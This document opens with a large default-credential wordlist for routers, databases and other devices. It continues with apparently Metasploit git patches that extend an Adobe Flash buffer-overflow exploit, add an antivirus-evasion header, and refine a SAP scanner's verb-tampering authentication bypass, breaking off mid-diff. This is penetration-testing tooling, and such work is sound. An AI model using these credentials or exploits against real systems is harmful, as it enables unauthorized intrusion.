OPERVAX -Bobo hello - Congress - central -WANGTEK WANGTEK -disttech etas -OWA OWA -USER2 USER2 -jasperadmin jasperadmin -FIELD DIGITAL -root uClinux -guest guestgue -FAXUSER FAXUSER -WINSABRE SABRE -VMBSYSAD -admin ip400 -PVM -ctb_admin sap123 - AMI.KEY - AMI.KEZ -  ANYCOM -USER_TEMPLATE -DEMO4 - inuvik49 -QSRV 11111111 -qsrv qsrv -superdba admin -PORTAL30 PORTAL31 -PORTAL30 PORTAL30 -XPRT XPRT -Crowd password -User 19750407 -18364 - zjaaadc -ilom-admin ilom-admin -rdc123 rdc123 -sysopr sysopr -tasman tasmannet -SYSTEM 0RACLE8I - Cisco router -admin store - SER -blank blank -ADMIN PASSWORD -admin IP address -WEBREAD WEBREAD -ODM ODM -11111111 11111111 -prime prime -AURORA$ORB$UNAUTHENTICATED INVALID -ADAMS WOOD -root vertex25 -sys bin -lp lineprin -Craft crftpw -www www -postgres dbpass -rfmngr $rfmngr$ -sync sync -WANGTEK - 1988 -MAINT -SYSTEST_CLIG SYSTEST -user user0000 -user_approver demo -ilom-operator ilom-operator -Nice-admin nicecti - HELGA-S -answer -NETNONPRIV NETNONPRIV -nuucp -CIDS CIDS -VASTEST -primenet primenet -redline redline - rw -spcl 0000 -admin muze -MBMANAGER MBMANAGER -webmaster -APPLSYS FND - ro -WINDOWS_PASSTHRU WINDOWS_PASSTHRU -USER4 USER4 -hqadmin hqadmin -UOMNI_ -FIELD TEST -sys system -Admin 123qwe -VMUTIL -POST BASE - dn_04rjc -uucpadm uucpadm -halt -FAXWORKS FAXWORKS -admin password1 -EXFSYS EXFSYS -4Dgifts -JMUSER JMUSER -admin imsa7.0 -SUPERVISOR NETFRAME -CIS CIS -UNITY_ - ciscofw -HLW HLW -admin brocade1 -pwrchute pwrchute - setup - Tiny -IDMSSE -postgres svcPASS83 -NSA nsa -!root !ishtar -admin blank -root NeXT -TELEDEMO TELEDEMO - AMIDECOD -recover recover -TRAVEL TRAVEL -lexar - efmukl -viewer -LIBRARY -admin raritan -PO8 PO8 -root@localhost root -NAMES NAMES -secofr secofr -PDMREMI - biostar -MGE VESOFT -USER7 USER7 -OWA_PUBLIC OWA_PUBLIC -questra questra -builtin builtin -SFCNTRL -SAP* 6071992 -boss boss -anonymous password - isolation - Q54arwms -PLEX PLEX -OLAPDBA OLAPDBA - g6PJ -OLAPSVR INSTANCE -user_expert demo -root pixmet2003 -Bhosda Lund -TEST -qsvr ibmcel -CMSBATCH CMSBATCH - ABCD -gropher - AM -administrator admin - condo - Toshiba - familymacintosh -TAHITI TAHITI -NEWINGRES NEWINGRES - AMI?SW - mMmM -man man -VM3812 -root powerapp -ibm service -VIF_DEVELOPER VIF_DEV_PWD -ADMIN WELCOME -Admin Barricade -joeuser joeuser -system isp -IPC -HELPDESK HELPDESK -wlpisystem wlpisystem -TSAFVM -prtgadmin prtgadmin -SYSTEM CHANGE_ON_INSTALL - CONCAT - t0ch88 -webmaster webmaster - djonet -ADMIN changeme -Any - Compaq -UAMIS_ -theman changeit -CISINFO CISINFO -mobile dottie -QS_CB QS_CB -CDEMORID CDEMORID -tech nician -DEMO2 -administrator none -SYS MANAG3R -End User 7936 -PORTAL30_PUBLIC PORTAL30_PUBLIC -sysadmin nortel -SYS D_SYSTPW -SYSTEM SYSPASS -Guest blank -User User -MDDEMO_CLERK CLERK -FIELD FIELD -Admin SECRET123 -Guest Guest -PHANTOM -admin amigosw1 - xmux -write -ADMINISTRATOR SENTINEL -system field - ducati900ss -qsecofr 22222222 - lkw peter - awkward - TzqF -SYSTEST_CLIG SYSTEST_CLIG -ODS ODS -admin axis2 -BLAKE PAPER -TSDEV TSDEV -PRODBM -admin letmein - joh316 -dos dos -login 0000 -APL2PP -system hdms -admin phplist -god1 12345 -admin novell -CICSUSER CISSUS -22222222 22222222 -root passw0rd -user_publisher demo -OSE$HTTP$ADMIN (random password) -def trade -SuperUser kronites -QS_CBADM QS_CBADM -SYSA SYSA - 00000000 -STUDENT STUDENT -Draytek 1234 -SMDR SECONDARY -EREP -VSEMAN - OOOOOOOO -primos_cs prime -demo -fwadmin xceladmin - j64 -MTS_USER MTS_PASSWORD - AWARD_SW -AQDEMO AQDEMO -private ReadWrite access secret - GWrv - MagiMFP - SnuFG5 -IS_$hostname IS_$hostname -HPSupport badg3r5 -ORASSO ORASSO -GATEWAY - t0ch20x -CVIEW -SH SH - zeosx -XXSESS_MGRYY X#1833 - wodj - FOOBAR -SYSMAN SYSMAN -VMMAP -admin urchin -PORTAL30_DEMO PORTAL30_DEMO -Ezsetup -QS_CS QS_CS -administrator PlsChgMe! -CMSUSER - MCUrv -DEMO1 -admin adminadmin -userNotUsed userNotU - AMI~ -root ibm -ncadmin ncadmin -TESTPILOT TESTPILOT - Polrty -fg_sysadmin password -UETP UETP -QS QS -DBI MUMBLEFRATZ -  ILMI -SYSTEM SYS -JWARD AIROPLANE -APPS_MRC APPS_MRC - uboot -Moe hello -SENTINEL SENTINEL -admin netgear1 -Yak asd123 -PDP11 PDP11 - aammii -Flo hello -SLIDE SLIDEPW -root bagabu -primeos primeos - Spacve - 256256 -INFO INFO -checkfsys checkfsys -PRODCICS PRODCICS - foolproof - AWARD_PW -MXAGENT MXAGENT -SYSTEM ORACLE8I -admin no password -VMTLIBR -POWERCARTUSER POWERCARTUSER -VMBACKUP -CPNUC - QDI - shiva -distrib distrib0 -SUPERVISOR SUPERVISOR -SYSMAINT SERVICE -MIGRATE MIGRATE -CDEMOUCB CDEMOUCB -system prime -QSRV 22222222 - c -OLTSEP -sysbin sysbin -signa signa -autocad autocad - SWITCHES_SW -WEBDB WEBDB -daemon - aPAf -ncrm ncrm -SAMPLE SAMPLE - 1 -HCPARK HCPARK -ALLINONE ALLINONE -nm2user nm2user -SAVSYS -IIPS -PATROL PATROL - technolgi - MBIU0 -mailadmin secret -adm adm -TMSADM -tutor tutor -ESubscriber -CHEY_ARCHSVR CHEY_ARCHSVR -write synnet -software software -admin welcome -god2 12345 -bbs bbs - Dell -disttech disttech -FSFTASK2 - zbaaaca - prost -ORDSYS ORDSYS -Administrator administrator - 1234567890 -gopher gopher -PSFMAINT -SYSTEM MANAG3R - RM - s!a@m#n$p%c -EAdmin -12345 12345 -DECNET DECNET -OPERATIONS OPERATIONS -$system -REP_OWNER DEMO -PANAMA PANAMA -LIBRARIAN SHELVES -SYSTEM 0RACLE -fal -4Dgifts 4Dgifts - biosstar -NETSERVER NETSERVER - tiny -root TANDBERG -POWERCHUTE APC -USER5 USER5 -GPFD GPFD - 12345678 -blank admin -QS_OS QS_OS -sysadm admin -REPADMIN REPADMIN -Administrator 12345678 -0 0 -DEMO8 DEMO8 -DEMO9 DEMO9 -CDEMO82 CDEMO82 -admin boca raton -Administrator vision2 -administrator 0 -umountsys umountsys -snmp snmp -Username PASSWORD -volition -USER0 USER0 -CDEMOCOR CDEMOCOR -SYSTEST UETP -Rodopi Rodopi -DECNET NONPRIV -user_checker demo - tatercounter2000 -qserv qserv - ESSEX or IPC -AQ AQ -support -SAPR3 SAP -VRR1 VRR1 -fastwire fw -admi admin -FINANCE FINANCE -WinCCAdmin 2WSXcder -ESTOREUSER ESTORE -fax fax -VIRUSER VIRUSER -LINK LINK -APPLSYSPUB FNDPUB - BIOS -SYS ORACLE8 -SYS ORACLE9 -overseer overseer -checksys checksys -umountfs umountfs -DBDCCICS DBDCCIC -Admin password - x6zynd56 -TOAD TOAD -root mozart -ntpupdate ntpupdate -root router -MDDEMO_MGR MGR -ARCHIVIST -SUPERVISOR HARRIS - 11111 -billy-bob -lp bin -DECMAIL DECMAIL -alien alien -admin dnnadmin -nsroot nsroot -AdvWebadmin advcomm500349 -dvstation dvst10n -SERVICECONSUMER1 SERVICECONSUMER1 -MMO2 MMO2 -qsecofr 11111111 -NOC NOC -WWWUSER WWWUSER -root Serial port only -SAP SAPR3 -root t0talc0ntr0l4! -NEVIEW -MAIL -ODSCOMMON ODSCOMMON -fal fal -pixadmin pixadmin -ripeop -PENG - BIOSPASS -netlink netlink -L2LDEMO L2LDEMO -OUTLN OUTLN -12.x -scott tiger or tigger - toshy99 -dbase dbase - nz0u4bbe -fam fam - bell9 -Oper Oper -RMAIL RMAIL -administrator 19750407 -FND FND -admin exinda -PRIV PRIV -admin barney -SETUP - biodata - 24Banc81 -news news -VSEIPO - j09F -pw pw -GUEST -ilon ilon - award_? -SYS 0RACLE39 -SYS 0RACLE38 -DEFAULT DEFAULT - AMI!SW -PLSQL SUPERSECRET -root alpine -politcally correct -18140815 18140815 -APPUSER APPUSER -SUPERVISOR -CENTRA CENTRA -LBACSYS LBACSYS - alfarome -PDP8 PDP8 -SFCMI -administrator * * # -lpadm lpadm -Test Everything -bewan bewan - 2580 -DIP DIP - Sxyz -mfd mfd -MDDEMO MDDEMO - intermec - 589589 -SWPRO SWPRO -DES DES -root fibranne -Coco hello -GCS -rodopi rodopi - touchpwd= -Scott Tiger -Admin5 4tugboat -admin funkwerk -ANDY SWORDFISH -DESQUETOP -nobody -Manager 657 - mysweex -SYSTEM SYSLIB -NETCON NETCON -JONES STEEL -author author -MOESERV -web web -tech User -PUBSUB1 PUBSUB1 -SYS D_SYSPW -CATALOG CATALOG - IBM - Guest -SQLUSER -RE RE -REPORTS_USER OEM_TEMP -MFG MFG -POST POST -HPLASER HPLASER -HR HR -VIDEOUSER VIDEO USER -DBA SQL - CMOSPWD -guest1 guest -superuser asante -SYSTEM 0RACLE38 -SYSTEM 0RACLE39 -AUTOLOG1 -dadmin dadmin -AURORA$JIS$UTILITY$ -wlcsystem wlcsystem -news -CPRM From 97b63d708c992d74833cd6fcc1a00ad4824aabe0 Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi Date: Sun, 18 May 2014 18:18:23 +0200 Subject: [PATCH 21/33] Corrected naming to be in line with msf convention --- ...r_services_unhash.txt => default_pass_for_services_unhash.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename data/wordlists/{default_passwords_for_services_unhash.txt => default_pass_for_services_unhash.txt} (100%) diff --git a/data/wordlists/default_passwords_for_services_unhash.txt b/data/wordlists/default_pass_for_services_unhash.txt similarity index 100% rename from data/wordlists/default_passwords_for_services_unhash.txt rename to data/wordlists/default_pass_for_services_unhash.txt From c9bb2d516565331f93e8a4c1af85848dc474b20b Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi Date: Sun, 18 May 2014 20:55:50 +0200 Subject: [PATCH 22/33] Added headers to files --- data/wordlists/default_pass_for_services_unhash.txt | 3 +++ data/wordlists/default_userpass_for_services_unhash.txt | 3 +++ data/wordlists/default_users_for_services_unhash.txt | 3 +++ 3 files changed, 9 insertions(+) diff --git a/data/wordlists/default_pass_for_services_unhash.txt b/data/wordlists/default_pass_for_services_unhash.txt index 7203bcda29..6ad340cf2a 100644 --- a/data/wordlists/default_pass_for_services_unhash.txt +++ b/data/wordlists/default_pass_for_services_unhash.txt @@ -1,3 +1,6 @@ +# Default passwords from the unhash project. Useful for finding out +# factory default passwords in embedded devices or services. +# http://github.com/tkisason/unhash admin password diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt index ff0458f94b..c83ece0a21 100644 --- a/data/wordlists/default_userpass_for_services_unhash.txt +++ b/data/wordlists/default_userpass_for_services_unhash.txt @@ -1,3 +1,6 @@ +# Default user/passwords from the unhash project. Useful for finding out +# factory default passwords in embedded devices or services. +# http://github.com/tkisason/unhash admin admin admin diff --git a/data/wordlists/default_users_for_services_unhash.txt b/data/wordlists/default_users_for_services_unhash.txt index c36f0e7e2b..3ba04c3750 100644 --- a/data/wordlists/default_users_for_services_unhash.txt +++ b/data/wordlists/default_users_for_services_unhash.txt @@ -1,3 +1,6 @@ +# Default users from the unhash project. Useful for finding out +# factory default passwords in embedded devices or services. +# http://github.com/tkisason/unhash admin root From 9b29c572a7c1a6ade4184261c56919fca1debd9f Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi Date: Sun, 18 May 2014 21:14:17 +0200 Subject: [PATCH 23/33] Comments dont work with auth_brute.rb --- data/wordlists/default_pass_for_services_unhash.txt | 3 --- data/wordlists/default_userpass_for_services_unhash.txt | 3 --- data/wordlists/default_users_for_services_unhash.txt | 3 --- 3 files changed, 9 deletions(-) diff --git a/data/wordlists/default_pass_for_services_unhash.txt b/data/wordlists/default_pass_for_services_unhash.txt index 6ad340cf2a..7203bcda29 100644 --- a/data/wordlists/default_pass_for_services_unhash.txt +++ b/data/wordlists/default_pass_for_services_unhash.txt @@ -1,6 +1,3 @@ -# Default passwords from the unhash project. Useful for finding out -# factory default passwords in embedded devices or services. -# http://github.com/tkisason/unhash admin password diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt index c83ece0a21..ff0458f94b 100644 --- a/data/wordlists/default_userpass_for_services_unhash.txt +++ b/data/wordlists/default_userpass_for_services_unhash.txt @@ -1,6 +1,3 @@ -# Default user/passwords from the unhash project. Useful for finding out -# factory default passwords in embedded devices or services. -# http://github.com/tkisason/unhash admin admin admin diff --git a/data/wordlists/default_users_for_services_unhash.txt b/data/wordlists/default_users_for_services_unhash.txt index 3ba04c3750..c36f0e7e2b 100644 --- a/data/wordlists/default_users_for_services_unhash.txt +++ b/data/wordlists/default_users_for_services_unhash.txt @@ -1,6 +1,3 @@ -# Default users from the unhash project. Useful for finding out -# factory default passwords in embedded devices or services. -# http://github.com/tkisason/unhash admin root From 033757812d3879f646a3206f1552742b532551b2 Mon Sep 17 00:00:00 2001 From: Jonas Vestberg Date: Sun, 18 May 2014 22:43:51 +0200 Subject: [PATCH 24/33] Updates to adobe_flash_pixel_bender_bof: 1. Added embed-element to work with IE11 (and Firefox). Removed browser-requirements for ActiveX (clsid and method). 2. Added Cache-Control header on SWF-download to avoid AV-detection (no disk caching = no antivirus-analysis :). Testing performed: Successfully tested with Adobe Flash Player 13.0.0.182 with IE9, IE10 and IE11 running on Windows 7SP1. (Exploit will trigger on FF29, although sandboxed.) --- .../windows/browser/adobe_flash_pixel_bender_bof.rb | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index 43997895ef..9c28caa2f8 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module - has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over - Windows XP SP3, Windows 7 SP1 and Windows 8. + has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 + over Windows XP SP3, Windows 7 SP1 and Windows 8. }, 'License' => MSF_LICENSE, 'Author' => @@ -50,10 +50,10 @@ class Metasploit3 < Msf::Exploit::Remote 'BrowserRequirements' => { :source => /script|headers/i, - :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", - :method => "LoadMovie", + #:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", + #:method => "LoadMovie", :os_name => Msf::OperatingSystems::WINDOWS, - :ua_name => Msf::HttpClients::IE, + #:ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote if request.uri =~ /\.swf$/ print_status("Sending SWF...") - send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end @@ -111,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote + From 975cdcb53758a1aeb6329a0a5c08b9174a2c8a68 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 18 May 2014 23:24:01 -0500 Subject: [PATCH 25/33] Allow exploitation also on FF --- .../windows/browser/adobe_flash_pixel_bender_bof.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index 9c28caa2f8..0d03d85173 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'InitialAutoRunScript' => 'migrate -f', + # Disabled by default to allow sessions on Firefox, still useful when exploiting IE + #'InitialAutoRunScript' => 'migrate -f', 'Retries' => false, 'EXITFUNC' => "thread" }, @@ -50,10 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote 'BrowserRequirements' => { :source => /script|headers/i, - #:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", - #:method => "LoadMovie", :os_name => Msf::OperatingSystems::WINDOWS, - #:ua_name => Msf::HttpClients::IE, + :ua_name => lambda { |ua| print_status(ua); ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF}, :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => From 2fb0dbb7f8fbc14552a0dd91d007ae01cf06713f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 18 May 2014 23:34:04 -0500 Subject: [PATCH 26/33] Delete debug print_status --- .../exploits/windows/browser/adobe_flash_pixel_bender_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index 0d03d85173..c29080ed3c 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote { :source => /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, - :ua_name => lambda { |ua| print_status(ua); ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF}, + :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF}, :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => From e59f104195f37146cadf3151b32591bfd9153f9b Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 19 May 2014 10:41:01 +0100 Subject: [PATCH 27/33] Use unless --- .../auxiliary/scanner/sap/sap_icm_urlscan.rb | 144 ++++++++++-------- 1 file changed, 80 insertions(+), 64 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 870936569c..87246442be 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -30,143 +29,160 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]), - OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"]) + OptPath.new('URLFILE', [true, "SAP ICM Paths File", + File.join(Msf::Config.data_directory, 'wordlists', 'sap_icm_paths.txt')]) ], self.class) end # Base Structure of module borrowed from jboss_vulnscan def run_host(ip) - # If URLFILE is set empty, obviously the user made a silly mistake - if datastore['URLFILE'].empty? - print_error("Please specify a URLFILE") - return - end - - # Initialize the actual URLFILE path - if datastore['URLFILE'] == "sap_icm_paths.txt" - url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}" - else - # Not the default sap_icm_paths file - url_file = datastore['URLFILE'] - end - - # If URLFILE path doesn't exist, no point to continue the rest of the script - if not File.exists?(url_file) - print_error("Required URL list #{url_file} was not found") - return - end - - res = send_request_cgi( + res = send_request_cgi( { 'uri' => "/" + Rex::Text.rand_text_alpha(12), 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) + }) if res print_status("Note: Please note these URLs may or may not be of interest based on server configuration") @info = [] - if not res.headers['Server'].nil? + if res.headers['Server'] @info << res.headers['Server'] print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}") else print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header") end - if (res.body and /class="note">(.*)code:(.*)(.*)code:(.*) 0 + l = store_loot( + 'sap.icm.urls', + "text/plain", + datastore['RHOST'], + @valid_urls, + "icm_urls.txt", "SAP ICM Urls" + ) + print_line + print_good("Stored urls as loot: #{l}") if l + end end def check_url(url) + full_url = write_url(url) res = send_request_cgi({ - 'uri' => url, + 'uri' => normalize_uri(url), 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) + }) if (res) - if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil? - print_good("New server header seen [#{res.headers['Server']}]") - @info << res.headers['Server'] #Add To seen server headers + if res.headers['Server'] + unless @info.include?(res.headers['Server']) + print_good("New server header seen [#{res.headers['Server']}]") + @info << res.headers['Server'] #Add To seen server headers + end end - case - when res.code == 200 - print_good("#{rhost}:#{rport} #{url} - does not require authentication (200) (length: #{res.headers['Content-Length']})") - when res.code == 403 - print_good("#{rhost}:#{rport} #{url} - restricted (403)") - when res.code == 401 - print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}") + case res.code + when 200 + print_good("#{full_url} - does not require authentication (#{res.code})") + @valid_urls << full_url << "\n" + when 403 + print_status("#{full_url} - restricted (#{res.code})") + when 401 + print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}") # Attempt verb tampering bypass bypass_auth(url) - when res.code == 404 + when 404 # Do not return by default, only display in verbose mode - vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)") - when res.code == 500 - print_good("#{rhost}:#{rport} #{url} - produced a server error (500)") - when res.code == 301, res.code == 302 - print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)") + vprint_status("#{full_url} - not found (#{res.code})") + when 400,500 + print_status("#{full_url} - produced a server error (#{res.code})") + when 301, 302 + print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") + @valid_urls << full_url << "\n" + when 307 + vprint_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") else - vprint_status("#{rhost}:#{rport} - unhandle response code #{res.code}") + print_error("#{full_url} - unhandled response code #{res.code}") + @valid_urls << full_url << "\n" end else - print_status("#{rhost}:#{rport} #{url} - not found (No Response code Received)") + vprint_status("#{full_url} - not found (No Repsonse code Received)") end end + def write_url(path) + if datastore['SSL'] + protocol = 'https://' + else + protocol = 'http://' + end + + "#{protocol}#{rhost}:#{rport}#{path}" + end + def bypass_auth(url) - print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})") + full_url = write_url(url) + vprint_status("#{full_url} Check for verb tampering (#{datastore['VERB']})") res = send_request_raw({ - 'uri' => url, + 'uri' => normalize_uri(url), 'method' => datastore['VERB'], 'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason - }, 20) + }) - if (res and res.code == 200) - print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering (length: #{res.headers['Content-Length']})") + if (res && res.code == 200) + print_good("#{full_url} Got authentication bypass via HTTP verb tampering") + @valid_urls << full_url << "\n" else - print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") + vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") end end + # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS. + # This is how the message server finds out which URLs must be forwarded where. + # (SAP help) -> this disclose custom URLs that are also checked for authentication def check_urlprefixes - # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS. This is how the message server finds out which URLs must be forwarded where." (SAP help) - # -> this disclose custom URLs that are also checked for authentication + urls = [] res = send_request_cgi({ 'uri' => "/sap/public/icf_info/urlprefix", 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) - if (res and res.code == 200) + }) + + if (res && res.code == 200) res.body.each_line do |line| if line =~ /PREFIX=/ url_enc = line.sub(/^PREFIX=/, '') + # Remove CASE and VHOST + url_enc = url_enc.sub(/&CASE=.*/, '') url_dec = URI.unescape(url_enc).sub(/;/, '') - check_url(url_dec.strip) + urls << url_dec.strip end end + else + print_error("#{rhost}:#{rport} Could not retrieve urlprefixes") end + + urls end end From 88b7dc3def814bb390a62d2e42a473fedae8a062 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 19 May 2014 10:46:47 +0100 Subject: [PATCH 28/33] re-add content length --- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 87246442be..a2be50da68 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary case res.code when 200 - print_good("#{full_url} - does not require authentication (#{res.code})") + print_good("#{full_url} - does not require authentication (#{res.code}) (length: #{res.headers['Content-Length']})") @valid_urls << full_url << "\n" when 403 print_status("#{full_url} - restricted (#{res.code})") From 5d96f54410a0e6630dfb2e1f71f1ac5212073693 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 19 May 2014 10:52:06 +0100 Subject: [PATCH 29/33] Be verbose about 307 --- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index a2be50da68..cd3116d67c 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -116,11 +116,11 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{full_url} - not found (#{res.code})") when 400,500 print_status("#{full_url} - produced a server error (#{res.code})") - when 301, 302 + when 301, 302, print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") @valid_urls << full_url << "\n" when 307 - vprint_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") + print_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") else print_error("#{full_url} - unhandled response code #{res.code}") @valid_urls << full_url << "\n" From 848227e18ab9a32bb7dcf5ac976844631c5cb26b Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 19 May 2014 10:59:38 +0100 Subject: [PATCH 30/33] 401 should be a valid url --- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index cd3116d67c..7c26bbd1dc 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -109,6 +109,7 @@ class Metasploit3 < Msf::Auxiliary print_status("#{full_url} - restricted (#{res.code})") when 401 print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}") + @valid_urls << full_url << "\n" # Attempt verb tampering bypass bypass_auth(url) when 404 @@ -153,7 +154,6 @@ class Metasploit3 < Msf::Auxiliary if (res && res.code == 200) print_good("#{full_url} Got authentication bypass via HTTP verb tampering") - @valid_urls << full_url << "\n" else vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") end From 0ef2e07012081b47a560ca0c17c14fadc11889af Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 19 May 2014 08:59:54 -0500 Subject: [PATCH 31/33] Minor desc and status updates, cosmetic --- .../admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 2 +- modules/auxiliary/scanner/snmp/brocade_enumhash.rb | 4 ++-- modules/auxiliary/scanner/snmp/netopia_enum.rb | 2 +- modules/auxiliary/scanner/snmp/ubee_ddw3611.rb | 2 +- .../windows/antivirus/symantec_workspace_streaming_exec.rb | 6 +++--- 5 files changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 4812b2a232..f22cfe9fa2 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The vulnerability exists in the DBVisitor.dll component, and can be abused through malicious requests to the ChartThemeConfig web service. This module can be used to extract the site - and projects usernames and hashes. + and project usernames and hashes. }, 'References' => [ diff --git a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb 